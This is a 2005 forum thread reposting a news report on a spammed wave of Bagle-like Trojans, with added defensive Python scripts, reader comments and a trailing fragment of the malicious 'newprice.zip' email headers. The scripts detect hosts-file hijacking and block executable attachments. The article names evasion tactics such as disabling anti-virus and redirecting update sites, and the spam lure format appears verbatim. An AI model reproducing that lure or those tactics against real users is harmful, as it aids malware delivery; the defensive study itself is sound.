Posted on 03/01/2005 12:36:33 PM PST by Eagle9
A major wave of Bagle-like Trojan horses hit users worldwide Tuesday with numerous variations that aim to overwhelm anti-virus defenses by morphing faster than research labs can release new signatures.
The attack, which began about midnight EST, was launched in a large-scale spamming campaign, said virus researchers, and although the new threat doesn't spread on its own -- these are Trojans with Bagle characteristics, not true worms -- many security vendors have bumped up warnings to get out the word.
It's unclear how many variations are at large. Some vendors, such as Symantec, had reported only two as of mid-morning Tuesday. Others, such as the U.K.-based Sophos, said there were at least four or five distinct versions. According to Reston, Va.-based iDefense, some sources are reporting as many as 15 copy-cats.
"Wave attacks are becoming increasingly common," said Ken Dunham, iDefense's director of malicious code research, in an e-mail to TechWeb. "Multiple minor variants are rapidly seeded into the wild to help the overall success of the attack."
The purpose of the attack seems to be to infect a large number of systems, which can later be turned into spam zombies, worm launch pads, or denial-of-service proxies.
"Compromised systems could cause all kinds of mischief," said Graham Cluley, a senior technology consultant with Sophos. "The attacker's intention is to use those computers for some other purpose, perhaps spamming. Once the Trojan's in place, it can update by downloading a new malicious component from any of a large number of Web sites."
So far, the sites -- which are hard-coded into the Trojan horse -- aren't hosting anything suspicious, added Cluley, but Sophos and others are monitoring the sites carefully. It's not unusual for an attack to infect systems, leave a backdoor open like this, and then only much later -- after the "heat" has died down -- download the zombie code.
These Trojans -- which, in the confusion of the attack and the long-running problem of multiple Bagle versions, are named everything from Bagle.be to Beagle.bh to BagleDI-L -- also try to disable a large number of anti-virus or firewall products found on the target PC.
Other self-defense tactics used by the Trojans include changing the Windows HOSTS file so that users can no longer reach security Web sites for virus updates, and renaming security software files so that once the system is rebooted, anti-virus and/or firewall programs won't run.
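The HOSTS-file tactic is easy to check for on a suspect machine: a clean hosts file never contains security-vendor names, so any line that maps one to loopback, 0.0.0.0 or some other address is a finding. The script below is an added example, not code from the article or from any vendor it quotes; the vendor watchlist and the tampered sample file are assumptions constructed for illustration (on a real machine you would read C:\Windows\System32\drivers\etc\hosts instead of SAMPLE_HOSTS).

```python
import ipaddress

# Illustrative watchlist of security-vendor domains (an assumption for this
# example; the article names no specific sites).
VENDOR_DOMAINS = (
    "symantec.com", "sophos.com", "mcafee.com", "trendmicro.com",
    "kaspersky.com", "f-secure.com", "windowsupdate.com",
)

# Constructed sample of a tampered hosts file; not taken from a real infection.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1   www.symantec.com  securityresponse.symantec.com   # added by malware
127.0.0.1   liveupdate.symantec.com
0.0.0.0     www.sophos.com
192.0.2.10  update.mcafee.com
10.0.0.5    intranet.example.local
"""


def parse_hosts(text):
    """Yield (address, hostname) pairs; comments and blank lines are skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        for name in parts[1:]:
            yield parts[0], name.lower()


def in_watchlist(hostname, watchlist):
    """True if hostname is a watchlisted domain or a subdomain of one."""
    return any(hostname == d or hostname.endswith("." + d) for d in watchlist)


def classify_address(addr):
    """'blackholed' for loopback/0.0.0.0, 'redirected' for anything else."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return "redirected"
    return "blackholed" if ip.is_loopback or ip.is_unspecified else "redirected"


def find_hijacked_entries(text, watchlist=VENDOR_DOMAINS):
    """Return (address, hostname, kind) for every hosts entry that overrides a
    watchlisted domain. A clean hosts file yields an empty list."""
    return [(addr, name, classify_address(addr))
            for addr, name in parse_hosts(text)
            if in_watchlist(name, watchlist)]


if __name__ == "__main__":
    for addr, name, kind in find_hijacked_entries(SAMPLE_HOSTS):
        print(f"{kind:11} {name} -> {addr}")
```

Entries pinned to loopback or 0.0.0.0 silently break update downloads; an entry pointing at a routable address is the more dangerous case, since "updates" would then be fetched from whoever controls that host. Either way the fix is to remove the lines and then update the anti-virus product before trusting its verdict.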
"Any Trojan which turns off your anti-virus or firewall can open you up to further attack, even by very old viruses," added Cluley.
Most of the variations arrive as .exe attachments or within .zip compressed files, joined to terse e-mails with no subject and a message reading simply "Price" or "New price."
The quick spread of the threat is due to the large spamming run that launched it. "This was spammed out en masse," said Cluley. "Some companies have seen thousands of copies hit their gateways."
Most security firms were reporting a continued increase in the number of copies reaching users. "Just nine hours after it began, it was already seventh on our list of Trojan horses," said Cluley.
The facts that the initial spam seeding was much larger than usual and that so many variants rolled out so quickly speak to the deviousness of hackers, said iDefense's Dunham.
"Hackers have been testing their code prior to the attack to ensure that certain anti-virus products do not detect the new minor variants," he said. "They have become increasingly sophisticated and organized in what they're doing [as they] attempt to steal sensitive information or gain control over computers."
The usual recommendations apply, security firms told users: update anti-virus defenses often.
Cluley went a step further. "It's time everyone woke up and stopped executable code at the gateway. There's no reason why users should be installing software from any e-mail message. That should all have to come through the IT department. Doing anything else [but blocking executables] is a huge security risk."
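A minimal version of the gateway policy Cluley describes, written here as an added example (not code from TechWeb, Sophos, or the article): parse the message, decode each attachment, and reject anything that is executable by extension or by its PE "MZ" header, looking inside .zip archives as well, since the article says most copies arrive that way. The message it scans is constructed in the script to mirror the "price" mails described above; the extension list and the rejection rules are this example's own assumptions.

```python
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Extensions Windows will run directly; an illustrative list, not the article's.
EXEC_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js", ".hta"}
PE_MAGIC = b"MZ"
ZIP_MAGIC = b"PK\x03\x04"


def build_sample_message():
    """Constructed stand-in for the 'price' spam: terse HTML body, no Subject,
    plus newprice.zip holding a PE-headed price.exe. Not a real sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("price.exe", PE_MAGIC + b"\x90\x00" * 32)
    msg = EmailMessage()
    msg["From"] = "sender@example.org"
    msg["To"] = "victim@example.com"
    msg.set_content("<html><body>price<br><br></body></html>", subtype="html")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="octet-stream", filename="newprice.zip")
    return msg.as_bytes()


def looks_executable(name, head):
    """Executable by filename extension or by the PE magic in the first bytes."""
    name = (name or "").lower()
    ext = name[name.rfind("."):] if "." in name else ""
    return ext in EXEC_EXTENSIONS or head.startswith(PE_MAGIC)


def inspect_attachment(filename, data):
    """Return the policy violations for one attachment; an empty list is clean."""
    reasons = []
    if looks_executable(filename, data[:2]):
        reasons.append(f"executable attachment: {filename}")
    if data[:4] == ZIP_MAGIC:
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    if info.is_dir():
                        continue
                    try:
                        with zf.open(info) as member:
                            head = member.read(2)  # only the magic, never the whole member
                    except RuntimeError:
                        # Encrypted member: we cannot vet it, so the archive fails policy.
                        reasons.append(f"cannot inspect encrypted member: {filename}/{info.filename}")
                        continue
                    if looks_executable(info.filename, head):
                        reasons.append(f"executable inside archive: {filename}/{info.filename}")
        except zipfile.BadZipFile:
            reasons.append(f"corrupt archive: {filename}")
    return reasons


def scan_message(raw):
    """Decode every attachment of a raw RFC 822 message and collect violations."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        findings.extend(inspect_attachment(part.get_filename(), data))
    return findings


if __name__ == "__main__":
    for finding in scan_message(build_sample_message()):
        print("QUARANTINE:", finding)
```

A gateway would quarantine on any non-empty result rather than bounce it, since the sender address on these mails is forged. Checking the "MZ" header as well as the extension matters because a renamed payload (price.dat, say) still runs once a user renames it back; reading only two bytes per archive member keeps the check cheap and avoids inflating an oversized archive.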
It is interesting that these attacks keep coming. I really don't think it's your little nerd sitting at his puter at home anymore.
There's a really good way to avoid this; it's a great cure. --> http://distrowatch.com/
I had to be the first :)
Virus alert!
Stop--correction should be "Trojan" Alert!
Is this Windows Outlook specific?
Good grief. Maybe you can explain to me what the point is of disrupting the lives of so many people. just for the H of it? What a waste of time, energy and intellect.
No, it's Dumb User Opening Attachment specific.
Bah! The people writing these viruses are the good guys. Let's not blame them for anything. It's all Microsoft's fault. </sarcasm>
You would think that by now, no one would be dumb enough to click on an email attachment, especially one in "terse e-mails with no subject and a message reading simply 'Price' or 'New price'." But nooooo. Ten thousand bozos will turn their computers into spam engines by clicking on this thing. And then they'll wonder why their computer is running so slowly.
Any company that allows any kind of content that might contain a virus payload in through their email gateway deserves to get hit. If you need to get software from someone, there are other ways than email to get it.
Not being able to email executable code is a mild inconvenience compared to having to clean up the mess caused by a virus let loose in a corporate LAN environment. I speak from experience.
I think it is one or more foreign governments / their militaries.
I've been getting these idiotic FBI@FBI.GOV e-mails claiming "You've been visiting 40 illegal sites" and demanding I fill out a questionnaire conveniently contained in a compressed file.
Or, you can use FireFox on OS X.
True, but it's no longer kids doing it for fun.
Virus/spam and crime are a team now. There's an underground economy in infected machines (bots) used for spam and denial-of-service attacks, which have been used in extortion of online gambling sites.
Doohickey -- I've been getting the same attack since last Friday... I delete every one of them without looking because I figure if going to RushLimbaugh.com and Free Republic are illegal websites I'm ready for a confrontation with any authorities....
Let's contribute something constructive to the discussion, okay? :^)
----------bilnsatjoywkldgbtsxk
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit
<html><body>
price<br><br>
<br>
</body></html>
----------bilnsatjoywkldgbtsxk
Content-Type: application/octet-stream;
name="newprice.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="newprice.zip"